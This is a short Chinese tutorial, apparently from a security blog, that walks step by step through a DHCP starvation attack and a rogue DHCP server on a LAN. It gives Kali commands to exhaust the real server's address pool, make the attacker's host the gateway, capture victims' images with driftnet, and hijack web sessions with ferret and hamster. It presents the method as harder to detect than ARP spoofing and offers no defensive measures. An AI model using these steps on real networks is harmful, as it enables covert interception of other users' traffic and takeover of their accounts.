通常內網滲透都是基於ARP的攻擊,但ARP攻擊對內網的負擔太重,很容易被發現。今天講的是基於DHCP協議的攻擊。
基於DHCP的攻擊理解起來很簡單,首先偽造Mac地址耗竭正常的DHCP服務器的IP地址,然后黑客用自己的主機偽造一個DHCP服務器,那么新連上內網的主機只能使用流氓DHCP服務器分配的IP,這樣黑客的主機就變成了內網網關,可以借此控制內網中其他主機的網絡流量。
攻擊環境
操作系統:Kali linux
網關: 192.168.177.1
IP地址: 192.168.177.128
網段:192.168.177.1/24
0×01 開啟操作系統的路由轉發
echo "1" >/proc/sys/net/ipv4/ip_forward
0×02 攻擊正常的dhcp服務器,耗光ip資源
dhcpstarv -i eth0 -e 192.168.177.128
Kali默認沒有安裝dhcpstarv,也可以用yersinia代替
0×03 安裝dhcp服務器udhcpd
# apt-get install udhcpd
然后修改一下配置文件
# vim /etc/udhcpd.conf
0×04 啟動DHCP服務器
service udhcpd start
然后啟動另一台Kali機當作目標靶機,由於正常的DHCP服務器已經沒有可分配的IP資源,新的內網主機就會使用攻擊者DHCP服務器分配的IP
0×05 抓取目標靶機的圖片
在攻擊主機上開啟driftnet
# driftnet -i eth0
在目標靶機打開百度圖片
在攻擊者的服務器上就可以看到圖像
0×06 會話劫持
開啟wireshark抓取流經本地網卡的數據包,由於其他的機器走的是攻擊者主機的網卡,這也意味着wireshark可以抓取其他主機的數據包
用ferret解析一下
# ferret -r demo.pcap
會在本地生成一個名為hamster.txt的文件
然后運行harmter,這會在主機開啟1234端口
配置一下火狐代理
劫持成功